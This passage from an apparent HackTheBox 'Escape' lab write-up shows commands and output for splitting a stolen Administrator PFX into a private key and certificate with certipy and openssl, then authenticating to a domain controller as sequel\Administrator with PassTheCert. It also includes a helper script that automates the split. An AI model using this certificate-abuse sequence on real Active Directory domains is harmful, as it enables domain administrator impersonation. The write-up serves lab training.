PFX_Extraction (optional)


As pointed out earlier, a lot can be done with PFX files, since they contain the server certificate, any intermediate certificates, and the private key. It is entirely possible to extract the certificate (public key) and the private key from a PFX file as a separate pair.

Exporting PFX


┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ certipy cert -export -pfx administrator.pfx -password "" -out unprotected.administrator.pfx
Certipy v4.7.0 - by Oliver Lyak (ly4k)
 
[*] Writing PFX to 'unprotected.administrator.pfx'

Exporting the PFX file again with no password set, so the later openssl commands need no import password

Private Key


┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ openssl pkcs12 -in administrator.pfx -nocerts -out administrator.private
enter import password:
enter pem pass phrase: qwe123
verifying - enter pem pass phrase: qwe123

Extracting the private key from the administrator.pfx file. Since the PFX file was exported with no password, I don't need to provide an import password. However, it prompts me for a PEM passphrase. This is normal: by default openssl encrypts the private key it writes out, and the passphrase protects that encrypted PEM file. It is not a requirement of the key itself (the -nodes option would write the key unencrypted and skip the prompt). I set it to qwe123

Decryption


┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ openssl rsa -in administrator.private -out administrator.private.decrypted
Enter pass phrase for administrator.private: qwe123
writing RSA key

This is now a private key, but it is still encrypted with the passphrase chosen during extraction (qwe123), and the tooling used below expects a plain, unencrypted key. So it needs to be decrypted again.

Public Key


┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ openssl pkcs12 -in administrator.pfx -clcerts -nokeys -out administrator.public
enter import password:

Extracting the certificate (which carries the public key) from the administrator.pfx file. Since a certificate is public, openssl does not prompt me for a PEM passphrase the way it did for the private key. I don't provide an import password here either, since there isn't one
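The three openssl steps above can be collapsed into one pass, and there is a check worth running before handing the pair to any authentication tool: that the extracted private key really belongs to the extracted certificate. The bash helper below is an added example, not part of the original write-up and not code from certipy or PassTheCert; the function names pfx_split and pfx_key_matches_cert and the file paths are my own assumptions. It uses -nodes so the private key is written unencrypted immediately (no PEM passphrase, no separate openssl rsa decryption step), then compares the SHA-256 of the public key derived from the private key with the SHA-256 of the public key embedded in the certificate.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): split a PFX into an
# unencrypted PEM private key and a PEM certificate in one pass, then check
# that the key really belongs to the certificate before using the pair.
set -euo pipefail

# pfx_split <bundle.pfx> <import-password> <out-prefix>
# Writes <out-prefix>.key (unencrypted private key) and <out-prefix>.crt (leaf cert).
# Pass "" as the import password for an unprotected PFX such as the one certipy exported.
pfx_split() {
    local pfx="$1" pass="$2" out="$3"
    # -passin pass:... supplies the import password non-interactively.
    # -nodes writes the key unencrypted, so there is no PEM passphrase prompt
    # and no separate "openssl rsa" decryption step afterwards.
    openssl pkcs12 -in "$pfx" -passin "pass:${pass}" -nocerts -nodes -out "${out}.key"
    # -clcerts -nokeys keeps only the client (leaf) certificate: no CA chain, no key.
    openssl pkcs12 -in "$pfx" -passin "pass:${pass}" -clcerts -nokeys -out "${out}.crt"
}

# pfx_key_matches_cert <key.pem> <cert.pem>
# Succeeds (exit 0) only if the SHA-256 of the DER public key derived from the
# private key equals the SHA-256 of the public key embedded in the certificate.
# "openssl pkey" is used instead of "openssl rsa" so non-RSA keys work as well.
pfx_key_matches_cert() {
    local key="$1" crt="$2" k c
    k=$(openssl pkey -in "$key" -pubout -outform DER | openssl dgst -sha256 | awk '{print $NF}')
    c=$(openssl x509 -in "$crt" -noout -pubkey | openssl pkey -pubin -outform DER | openssl dgst -sha256 | awk '{print $NF}')
    [ "$k" = "$c" ]
}

# Stand-alone usage (hypothetical file names): ./pfx_split.sh administrator.pfx "" administrator
if [ "$#" -eq 3 ]; then
    pfx_split "$1" "$2" "$3"
    if pfx_key_matches_cert "$3.key" "$3.crt"; then
        echo "[+] $3.key matches $3.crt"
    else
        echo "[-] key/certificate mismatch" >&2
        exit 1
    fi
fi
```

Two notes on the design. OpenSSL 3 spells the no-encryption flag -noenc and still accepts -nodes, so the script works with either major version. Passing the import password as -passin pass:... puts it on the command line, where other users on the box can read it from the process list; for a real password, openssl's -passin env:VAR or -passin file:PATH forms avoid that, and an empty password, as here, has nothing to leak.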

Validation


┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ git clone https://github.com/AlmondOffSec/PassTheCert.git
Cloning into 'PassTheCert'...
remote: Enumerating objects: 109, done.
remote: Counting objects: 100% (109/109), done.
remote: Compressing objects: 100% (75/75), done.
remote: Total 109 (delta 47), reused 83 (delta 33), pack-reused 0
Receiving objects: 100% (109/109), 44.73 KiB | 2.63 MiB/s, done.
Resolving deltas: 100% (47/47), done.

According to the author’s blog, PassTheCert is a simple C# tool that can authenticate to an LDAP server using a client certificate, and perform actions that are interesting for an attacker. Unlike most other offensive tools, it has the added bonus of working in environments where LDAP Channel Binding is enabled, because Schannel authentication is, by design, not subject to Channel Binding.

┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ python3 PassTheCert/Python/passthecert.py -action whoami -crt administrator.public -key administrator.private.decrypted -domain SEQUEL.HTB -dc-ip $IP -port 636         
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] You are logged in as: sequel\Administrator

Successfully validated: the extracted certificate and decrypted private key authenticate to the DC over LDAPS (port 636) as sequel\Administrator.